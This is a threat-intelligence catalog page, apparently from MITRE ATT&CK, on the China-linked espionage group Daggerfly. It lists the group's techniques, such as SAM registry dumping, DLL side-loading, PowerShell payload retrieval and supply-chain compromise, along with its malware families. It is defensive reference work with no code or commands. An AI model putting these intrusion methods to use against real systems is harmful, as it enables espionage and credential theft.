1. Home
  2. Groups
  3. Daggerfly

Daggerfly

Daggerfly is a People's Republic of China-linked APT entity active since at least 2012. Daggerfly has targeted individuals, government and NGO entities, and telecommunication companies in Asia and Africa. Daggerfly is associated with exclusive use of MgBot malware and is noted for several potential supply chain infection campaigns.[1][2][3][4]

ID: G1034
Associated Groups: Evasive Panda, BRONZE HIGHLAND
Contributors: Furkan Celik, PURE7
Version: 1.0
Created: 25 July 2024
Last Modified: 31 October 2024

Associated Group Descriptions

Name Description
Evasive Panda

[1][4]
BRONZE HIGHLAND

[1][4]
Enterprise Layer
download view

Techniques Used

Domain ID Name Use
Enterprise T1036 .003 伪装: Rename System Utilities

Daggerfly used a renamed version of rundll32.exe, such as "dbengin.exe" located in the ProgramData\Microsoft\PlayReady directory, to proxy malicious DLL execution.[1]
Enterprise T1195 .002 供应链破坏: Compromise Software Supply Chain

Daggerfly is associated with several supply chain compromises using malicious updates to compromise victims.[2][4]
Enterprise T1136 .001 创建账户: Local Account

Daggerfly created a local account on victim machines to maintain access.[1]
Enterprise T1574 .002 劫持执行流: DLL Side-Loading

Daggerfly has used legitimate software to side-load PlugX loaders onto victim systems.[1] Daggerfly is also linked to multiple other instances of side-loading for initial loading activity.[4]
Enterprise T1059 .001 命令与脚本解释器: PowerShell

Daggerfly used PowerShell to download and execute remote-hosted files on victim systems.[1]
Enterprise T1584 .004 基础设施妥协: Server

Daggerfly compromised web servers hosting updates for software as part of a supply chain intrusion.[4]
Enterprise T1071 .001 应用层协议: Web Protocols

Daggerfly uses HTTP for command and control communication.[4]
Enterprise T1587 .002 开发能力: Code Signing Certificates

Daggerfly created code signing certificates to sign malicious macOS files.[4]
Enterprise T1003 .002 操作系统凭证转储: Security Account Manager

Daggerfly used Reg to dump the Security Account Manager (SAM) hive from victim machines for follow-on credential extraction.[1]
Enterprise T1012 查询注册表

Daggerfly used Reg to dump the Security Account Manager (SAM), System, and Security Windows registry hives from victim machines.[1]
Enterprise T1189 浏览器攻击

Daggerfly has used strategic website compromise for initial access against victims.[4]
Enterprise T1204 .001 用户执行: Malicious Link

Daggerfly has used strategic website compromise to deliver a malicious link requiring user interaction.[4]
Enterprise T1218 .011 系统二进制代理执行: Rundll32

Daggerfly proxied execution of malicious DLLs through a renamed rundll32.exe binary.[1]
Enterprise T1082 系统信息发现

Daggerfly utilizes victim machine operating system information to create custom User Agent strings for subsequent command and control communication.[4]
Enterprise T1105 输入工具传输

Daggerfly has used PowerShell and BITSAdmin to retrieve follow-on payloads from external locations for execution on victim machines.[1]
Enterprise T1053 .005 预定任务/作业: Scheduled Task

Daggerfly has attempted to use scheduled tasks for persistence in victim environments.[4]
Enterprise T1553 .002 颠覆信任控制: Code Signing

Daggerfly has used signed, but not notarized, malicious files for execution in macOS environments.[4]

Software

ID Name References Techniques
S0190 BITSAdmin Daggerfly has used BITSAdmin to retrieve files from remote locations to run on victim systems.[1] BITS任务, 替代协议渗出: Exfiltration Over Unencrypted Non-C2 Protocol, 横向工具传输, 输入工具传输
S1016 MacMa Daggerfly is linked to the use and potentially development of MacMa through overlapping command and control infrastructure and shared libraries with other unique tools.[3] 从密码存储中获取凭证: Keychain, 从本地系统获取数据, 创建或修改系统进程: Launch Agent, 加密通道, 反混淆/解码文件或信息, 命令与脚本解释器: Unix Shell, 屏幕捕获, 数据分段: Local Data Staging, 文件和目录发现, 本机API, 移除指标: Clear Linux or Mac System Logs, 移除指标: Timestomp, 移除指标: File Deletion, 系统信息发现, 系统所有者/用户发现, 系统网络配置发现, 输入工具传输, 输入捕获: Keylogging, 进程发现, 远程服务, 通过C2信道渗出, 非应用层协议, 非标准端口, 音频捕获, 颠覆信任控制: Code Signing, 颠覆信任控制: Gatekeeper Bypass
S1146 MgBot Daggerfly is uniquely associated with the use of MgBot since at least 2012.[2] 从信息存储库获取数据, 从可移动介质获取数据, 从密码存储中获取凭证, 从密码存储中获取凭证: Credentials from Web Browsers, 从本地系统获取数据, 剪贴板数据, 域信任发现, 操作系统凭证转储, 窃取Web会话Cookie, 系统所有者/用户发现, 网络服务发现, 账号发现: Domain Account, 账号发现: Local Account, 输入捕获: Keylogging, 进程发现, 远程系统发现, 音频捕获
S1147 Nightdoor Daggerfly uses Nightdoor as a backdoor mechanism for Windows hosts.[4][3] 劫持执行流, 反混淆/解码文件或信息, 命令与脚本解释器: Windows Command Shell, 应用层协议, 移除指标: File Deletion, 系统信息发现, 系统所有者/用户发现, 系统时间发现, 系统网络配置发现, 网络服务, 虚拟化/沙盒规避: System Checks, 进程发现, 预定任务/作业: Scheduled Task
S0013 PlugX Daggerfly has used PlugX loaders as part of intrusions.[1] 伪装: Masquerade Task or Service, 伪装: Match Legitimate Name or Location, 修改注册表, 创建或修改系统进程: Windows Service, 加密通道: Symmetric Cryptography, 劫持执行流: DLL Side-Loading, 劫持执行流: DLL Search Order Hijacking, 反混淆/解码文件或信息, 可信开发者工具代理执行: MSBuild, 启动或登录自动启动执行: Registry Run Keys / Startup Folder, 命令与脚本解释器: Windows Command Shell, 屏幕捕获, 应用层协议: Web Protocols, 应用层协议: DNS, 文件和目录发现, 本机API, 查询注册表, 混淆文件或信息, 系统网络连接发现, 网络共享发现, 网络服务: Dead Drop Resolver, 虚拟化/沙盒规避: System Checks, 输入工具传输, 输入捕获: Keylogging, 进程发现, 隐藏伪装: Hidden Files and Directories, 非应用层协议
S0075 Reg Daggerfly has used Reg to dump various Windows registry hives from victim machines.[1] 修改注册表, 未加密凭证: Credentials in Registry, 查询注册表

References

  1. Threat Hunter Team. (2023, April 20). Daggerfly: APT Actor Targets Telecoms Company in Africa. Retrieved July 25, 2024.
  2. Facundo Muñoz. (2023, April 26). Evasive Panda APT group delivers malware via updates for popular Chinese software. Retrieved July 25, 2024.
  1. Threat Hunter Team. (2024, July 23). Daggerfly: Espionage Group Makes Major Update to Toolset. Retrieved July 25, 2024.
  2. Ahn Ho, Facundo Muñoz, & Marc-Etienne M.Léveillé. (2024, March 7). Evasive Panda leverages Monlam Festival to target Tibetans. Retrieved July 25, 2024.